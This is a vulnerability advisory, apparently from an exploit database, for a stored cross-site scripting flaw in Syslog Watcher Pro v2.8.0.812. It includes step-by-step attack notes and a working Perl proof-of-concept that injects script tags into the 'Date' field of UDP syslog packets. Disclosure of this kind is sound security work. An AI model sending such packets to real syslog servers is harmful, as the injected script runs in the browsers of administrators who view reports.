Syslog Watcher Pro 'Date' Parameter Cross Site Scripting Vulnerability

vendor:

Syslog Watcher Pro

by:

demonalex/ChaoYi.Huang

6,4

CVSS

MEDIUM

Cross Site Scripting

CWE

Product Name: Syslog Watcher Pro

Affected Version From: v2.8.0.812

Affected Version To: v2.8.0.812

Patch Exists: NO

Related CWE: N/A

CPE: a:snmp_soft:syslog_watcher_pro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2013

Syslog Watcher Pro ‘Date’ Parameter Cross Site Scripting Vulnerability

Syslog Watcher Pro is a Windows-based syslog server for corporate networks. Syslog Watcher Pro collects, stores, parses, displays and explains syslog information to both new and professional network administrators. Syslog Watcher Pro(v2.8.0.812) is vulnerable to XSS by 'Date' Parameter of syslog protocol. Attackers can send a syslog packet which contained XSS code into 'Date' Parameter to Syslog Watcher Pro, which will be executed after victim generate and view report by Syslog Watcher Pro.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

Title: Syslog Watcher Pro 'Date' Parameter Cross Site Scripting Vulnerability
Software : Syslog Watcher Pro

Software Version : v2.8.0.812(Jun 15, 2009)

Vendor: http://www.snmpsoft.com/

Vulnerability Published : 2013-04-27

Vulnerability Update Time :

Status : 

Impact : Medium(CVSS2 Base : 6.4, AV:N/AC:L/Au:N/C:P/I:P/A:N)

Bug Description :
Syslog Watcher Pro is a Windows-based syslog server for corporate networks.
Syslog Watcher Pro collects, stores, parses, displays and explains syslog information to both new and professional network administrators.
Syslog Watcher Pro(v2.8.0.812) is vulnerable to XSS by 'Date' Parameter of syslog protocol.

How to Attack :
STEP 1: Send a syslog packet which contained XSS code into 'Date' Parameter to Syslog Watcher Pro.
STEP 2: Syslog Watcher Pro put XSS code into database.
STEP 3: XSS code will be executed after victim generate and view report by Syslog Watcher Pro.

Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl
use IO::Socket::INET;
$|=1;

$host=shift;
$port=shift;

if(defined($host) && defined($port)){
  ;
}else{
  die "usage: $0 host port\n";
}

$con=new IO::Socket::INET->new(PeerPort=>$port,
        Proto=>'udp',
        PeerAddr=>$host);

$npriority = '<0>';
$nhostname = "10.0.0.2";
$npid = 'test[10]';
$nmsg = "testing by demonalex";

$testcase1="<script>alert(\"XSS1\")</script>";
$testcase2="<script>alert(/XSS2/)</script>";

#testcase1
$header = $testcase1.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);

#testcase2
$header = $testcase2.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);

$con->close;

print "Over!\n";

exit(1);
-----------------------------------------------------------

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk
Independent Researcher
DBAPPSecurity Co.,Ltd./Hong Kong PolyU